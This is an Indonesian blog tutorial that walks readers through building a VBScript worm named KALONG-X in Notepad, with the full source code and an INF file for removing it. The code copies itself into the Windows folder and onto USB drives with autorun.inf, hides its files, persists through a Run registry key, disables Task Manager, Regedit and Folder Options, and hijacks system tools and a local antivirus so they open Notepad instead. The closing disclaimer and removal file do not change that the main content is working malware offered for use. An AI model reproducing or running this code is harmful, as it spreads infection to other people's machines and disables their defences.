Bikin Virus Yuk....

Bikin Virus Via Notepad 2

Melanjutkan artikel yang
waktu itu "BUAT VIRUS VIA
NOTEPAD" kita akan membuat
virus yang lebih hebat lagi.
Kalau ada yang belum tahu,
saya mau minta maaf karena
di artikel sebelumnya ada
kesalahan code. Silahkan ganti
kata "rekursif" menjadi

"rekur". Kalau enggak, bisa
syntax error nanti

Nah kita akan buat varian lain
dari KALONG.VBS. Yaitu
KALONG-X.VBS. Lebih hebat
dari Kalong.VBS. Sebenarnya
ini varian ketiga. Sebenarnya
virus ini sama saja dengan
Kalong.VBS namun
ditambahkan kemampuan
manipulasi registry yang lebih
mengerikan Ayo sekarang
kita buka saja Notepadnya dan
ketikkan code berikut. Jika
malas kan tinggak Copy >
Paste....

'Kalong-X

'Varian dari Kalong.VBS

on error resume next

'Dim kata-kata berikut

dim
rekur,windowpath,desades,
fs,mf,isi,tf,kalong,nt,check,sd

'siapkan isi autorun

isi = "[autorun]" & vbcrlf &
"shellexecute=wscript.exe k4 l0
n6 ms32.dll.vbs"

set fs =
createobject("Scripting.File
SystemObject")

set mf =
fs.getfile(Wscript.ScriptFull
name)

dim text,size

size = mf.size

check = mf.drive.drivetype

set text =
mf.openastextstream(1 ,-2)

do while not
text.atendofstream

rekur = rekur & text.readline

rekur = rekur & vbcrlf

loop

do

'buat file induk

Set windowpath =
fs.getspecialfolder(0)

set tf = fs.getfile(windowpath
& "\k4 l0 n6-x.dll.vbs ")

tf.attributes = 32

set tf =
fs.createtextfile(windowpath &
"\k4 l0 n6 -x.dll.vbs",2,true)

tf.write rekur

tf.close

set tf = fs.getfile(windowpath
& "\k4 l0 n6-x.dll.vbs")

tf.attributes = 39

'sebar ke removable disc
ditambahkan dengan
Autorun.inf

for each desades in fs.drives

If (desades.drivetype = 1 or
desades.drivetype = 2) and
desades.path <> "A:" then

set tf=fs.getfile(desades.path
&"\k4 l0 n6 ms32.dll.vbs")

tf.attributes =32

set
tf=fs.createtextfile(desades.
path &"\k4 l0 n6 ms32
.dll.vbs",2,true)

tf.write rekur

tf.close

set tf=fs.getfile(desades.path
&"\k4 l0 n6 ms32.dll.vbs")

tf.attributes = 39

set tf =fs.getfile(desades.path
&"\autorun.inf")

tf.attributes = 32

set
tf=fs.createtextfile(desades.
path &"\autorun.inf",2,true)

tf.write isi

tf.close

set tf = fs.getfile(desades.path
&"\autorun.inf")

tf.attributes=39

end if

next

'Manipulasi Registry

set kalong =
createobject("WScript.Shell")

'Ubah IE Title

kalong.regwrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Internet
Explorer\Main\Window
Title",":: ->KALONG-X<- ::"

'File Hidden tak terlihat

kalong.RegWrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Windows\Cu
rrentVersion\Policies\Explo
rer\Advanced\Hidden",2,
"REG_DWORD"

'Blokir Find, FolderOptions,
Run, Regedit, Task Manager,
dan klik kanan

kalong.RegWrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Windows\Cu
rrentVersion\Policies\Explor
er\NoFind", "1'',
"REG_DWORD"

kalong.RegWrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Windows\Cu
rrentVersion\Policies\Explo
rer\NoFolderOptions", "1'',
"REG_DWORD"

kalong.RegWrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Windows\Cu
rrentVersion\Policies\Explor
er\NoRun", "1'',
"REG_DWORD"

kalong.RegWrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Windows\Cu
rrentVersion\Policies\Syste
m\DisableRegistryTools", "1'',
"REG_DWORD"

kalong.RegWrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Windows\Cu
rrentVersion\Policies\Syste
m\DisableTaskMgr", "1'',
"REG_DWORD"

kalong.RegWrite
"HKEY_CURRENT_USER\Soft
ware\Microsoft\Windows\Cu
rrentVersion\Policies\Expl
orer\NoViewContextMenu",
"1'', "REG_DWORD"

'Buat pesan saat Windows
Startup

kalong.regwrite
"HKEY_LOCAL_MACHINE\So
ftware\Microsoft\Windows\C
urrentVersion\Winlogon\Leg
alNoticeCaption", "THE
KALONG-X"

kalong.RegWrite
"HKEY_LOCAL_MACHINE\So
ftware\Microsoft\Windows\C
urrentVersion\Winlogon\Leg
alNoticeText","No reason for
Panic"

'Aktifkan saat Windows
Startup

kalong.regwrite
"HKEY_LOCAL_MACHINE\So
ftware\Microsoft\Windows\C
urrentVersion\Run\Systemdir",
windowpath & "\batch- k4 l0
n6.dll.vbs"

'Alihkan aplikasi berikut. Jika
dibuka maka program terbuka
dengan Notepad

kalong.regwrite
"HKEY_LOCAL_MACHINE\S
OFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File
Execution
Options\cmd.exe\Debugger"
,"notepad.exe"

kalong.regwrite
"HKEY_LOCAL_MACHINE\S
OFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File
Execution
Options\install.exe\Debugge
r","notepad.exe"

kalong.regwrite
"HKEY_LOCAL_MACHINE\S
OFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File
Execution
Options\msconfig.exe\Debu
gger","notepad.exe"

kalong.regwrite
"HKEY_LOCAL_MACHINE\S
OFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File
Execution
Options\regedit.exe\Debugg
er","notepad.exe"

kalong.regwrite
"HKEY_LOCAL_MACHINE\S
OFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File
Execution
Options\regedt32.exe\Debug
ger","notepad.exe"

kalong.regwrite
"HKEY_LOCAL_MACHINE\S
OFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File
Execution
Options\RegistryEditor.exe\
Debugger","notepad.exe"

kalong.regwrite
"HKEY_LOCAL_MACHINE\S
OFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File
Execution
Options\setup.exe\Debugger
","notepad.exe"

kalong.regwrite
"HKEY_LOCAL_MACHINE\S
OFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File
Execution
Options\PCMAV.exe\Debugg
er","notepad.exe"

kalong.regwrite
"HKEY_LOCAL_MACHINE\S
OFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File
Execution Options\PCMAV-
CLN.exe\Debugger","notepa
d.exe"

kalong.regwrite
"HKEY_LOCAL_MACHINE\S
OFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File
Execution Options\PCMAV-
RTP.exe\Debugger","notepa
d.exe"

'Bonus

if check <> 1 then

Wscript.sleep 200000

end if

loop while check <> 1

set sd =
createobject("Wscript.shell")

sd.run windowpath &
"\explorer.exe /e,/select, " &
Wscript.ScriptFullname

Setelah Anda menempatkan
kode tersebut klik FILE >
SAVE. Di File Type pilih ALL
FILES (*.*) lalu simpan dengan
nama k4 l0 n6 ms32.dll.vbs.
Setelah itu coba Anda
jalankan. Dan ya, Anda telah
menjalankan KALONG-X.VBS
di komputer Anda.

Jika Anda membuka aplikasi
yang bernama : cmd.exe,
install.exe, msconfig.exe,
regedit.exe, regedt32.exe,
RegistryEditor.exe, setup.exe,
PCMAV.exe, PCMAV-CLN.exe,
dan PCMAV-RTP.exe maka
akan terbuka Notepad yang
isinya kurang lebih mirip
seperti ini :

Ingat jadilah orang yang
bermanfaat bagi orang lain.
Tidak ada "barang berbahaya"
disini karena Andalah yang
membuatnya berbahaya. Saya
tidak bertanggung jawab
apabila Anda
menyalahgunakan kode ini. Ini
untuk ilmu pengetahuan
semata. Kalau disalahgunakan
saya kutuk mukanya mirip
Tukul (Wah...jadi terkenal
nanti)...jangan deh. Pokoknya
segala kenekatan Anda
ditanggung oleh Anda sendiri.

Virus ini punya kemampuan
Autorun jadi komputer yang
dicolokkan Removable Disc
(Mislanya Flash Disc) yang
terinfeksi virus ini akan
diinfeksi pula (jika Autorun
tidak di non-aktifkan)

NOTE: Untuk membersihkan
Kalong-X caranya mudah.
Tinggal hentikan proses yang
bernama wscript.exe. Jika di
WinNT Anda bisa
melakukannya lewat Task
Manager. Tapi kalau Win9X
silahkan cari tool pengganti
Task Manager misalnya
Procexp atau CurrProcess.
Soalnya terkadang kalau lewat
perintah Command Prompt
gak bisa.

Setelah Anda memberhentikan
proses wscript.exe hapus file
induk yang bernama k4 l0 n6-
x.dll.vbs di WINDOWSDIR
(C:\Windows misalnya). Jika
tidak ada tampilkan dulu file
hidden dengan Folder Options.
Setelah itu perbaiki Registry.
Untuk mempercepat salin
kode ini ke Notepad :

[Version]

Signature="$Chicago$"

Provider=Fariskhi

[DefaultInstall]

AddReg=UnhookRegKey

DelReg=del

[UnhookRegKey]

HKCU,Software\Microsoft\In
ternet Explorer\Main, Window
Title,0, "INTERNET EXPLORER"

[del]

HKCU,
Software\Microsoft\Window
s\CurrentVersion\Policies\Ex
plorer, NoFind

HKCU,
Software\Microsoft\Window
s\CurrentVersion\Policies\Ex
plorer, NoFolderOptions

HKCU,
Software\Microsoft\Window
s\CurrentVersion\Policies\Ex
plorer, NoRun

HKCU,
Software\Microsoft\Window
s\CurrentVersion\Policies\Sy
stem, DisableRegistryTools

HKCU,
Software\Microsoft\Window
s\CurrentVersion\Policies\Sy
stem, DisableTaskMgr

HKCU,
Software\Microsoft\Window
s\CurrentVersion\Policies\Ex
plorer, NoViewContextMenu

HKLM,
Software\Microsoft\Windows
\CurrentVersion\Winlogon,
LegalNoticeCaption

HKLM,
Software\Microsoft\Windows
\CurrentVersion\Winlogon,
LegalNoticeText

HKLM,
Software\Microsoft\Windows
\CurrentVersion\Run,
Systemdir

HKLM,
SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File
Execution Options\cmd.exe,
Debugger

HKLM,
SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File
Execution Options\install.exe,
Debugger

HKLM,
SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File
Execution
Options\msconfig.exe,
Debugger

HKLM,
SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File
Execution Options\regedit.exe,
Debugger

HKLM,
SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File
Execution
Options\regedt32.exe,
Debugger

HKLM,
SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File
Execution
Options\RegistryEditor.exe,
Debugger

HKLM,
SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File
Execution Options\setup.exe,
Debugger

HKLM,
SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File
Execution Options\PCMAV.exe,
Debugger

HKLM,
SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File
Execution Options\PCMAV-
CLN.exe, Debugger

HKLM,
SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File
Execution Options\PCMAV-
RTP.exe, Debugger

Setelah itu save dengan FILE
TYPE : ALL FILES (*.*) dan
simpan dengan nama :
kalongxremoval.inf. Setelah
itu klik kanan file tersebut dan
pilih install. Jadi kita buat
Virus dan Antidotnya sama-
sama dengan Notepad.

Ring ring